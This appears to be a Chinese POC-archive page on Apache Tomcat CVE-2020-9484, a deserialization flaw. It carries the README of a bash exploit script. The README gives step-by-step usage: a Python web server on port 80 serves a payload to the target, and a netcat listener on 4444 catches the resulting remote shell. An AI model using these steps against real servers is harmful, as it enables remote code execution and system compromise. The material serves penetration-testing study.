关联漏洞
标题:
Apache Tomcat 代码问题漏洞
(CVE-2020-9484)
描述:Apache Tomcat是美国阿帕奇(Apache)基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。 Apache Tomcat中存在代码问题漏洞。攻击者可通过控制服务器上文件的内容和名称等方法利用该漏洞执行代码。以下产品及版本受到影响:Apache Tomcat 10.0.0-M1版本至10.0.0-M4版本,9.0.0.0.M1版本至9.0.43之前版本,8.5.0版本至8.5.63之前版本,7.0.0版本至7.0.108之前版本。
介绍
# Remote Code Execution Exploit in Apache Tomcat 9.0.27
Apache Tomcat 9.0.27 is vulnerable to Remote Code Execution with the CVE-ID CVE-2020-9484. Other versions may be affected as well. Tested on Kali 2020.4 and JDK 8. This bash script is a simpel proof-of-concept. For educational purpose only.
## Description
The vulnerability allows a remote attacker to execute arbitrary code on the target system.
The vulnerability exists due to insecure input validation when processing serialized data in uploaded files names. A remote attacker can pass specially crafted file name to the application and execute arbitrary code on the target system.
Successful exploitation of this vulnerability may result in complete compromise of vulnerable system but requires that the server is configured to use PersistenceManager with a FileStore and the attacker knows relative file path from storage location.
## Requirements
In order to use the script, [yoserial](https://github.com/frohoff/ysoserial) is needed. To install it:
`cd /opt && git clone https://github.com/frohoff/ysoserial`
`cd /opt/ysoserial && wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar -O ysoserial-master.jar`
If you have yoserial already installed, make sure to rename it to "yosorial-master.jar".
## Installation
To install the script, type:
`cd /opt && git clone https://github.com/PenTestical/CVE-2020-9484 && cd CVE-2020-9484/ && chmod +x CVE-2020-9484.sh`
## Help menu
To open the help menu, type:
`./CVE-2020-9484.sh --help`
or
`./CVE-2020-9484.sh -h`
## How to use it
First, open the script and place your own IP address at line 14:
`remote_ip="10.10.16.180" # change this`
This script creates the files "payload.sh", "downloadPayload.session", "chmodPayload.session" and "executePayload.session" in the same directory as you currently are. In order to use the exploit, you need to start a simpel listener at port 80. For example, usage with Python3 (start in same folder as you run the script):
`sudo python3 -m http.server 80`
Also, make sure to start a netcat listener at port 4444:
`nc -nvlp 4444`
Now run the script with the IP address of the target system you want to attack:
`./CVE-2020-9484.sh target-ip`
## Troubleshooting
If it does not work, make sure to use JDK 8. To test which version you use, type:
`java -version`
Could not work on JDK version 12 or higher. Read more about it [here](https://github.com/frohoff/ysoserial/issues/107).
文件快照
[4.0K] /data/pocs/2c0a1bdeee31bb4d1735cc04b6a3602cf0803897
├── [4.9K] CVE-2020-9484.sh
├── [ 272] install.txt
├── [ 34K] LICENSE
└── [2.4K] README.md
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。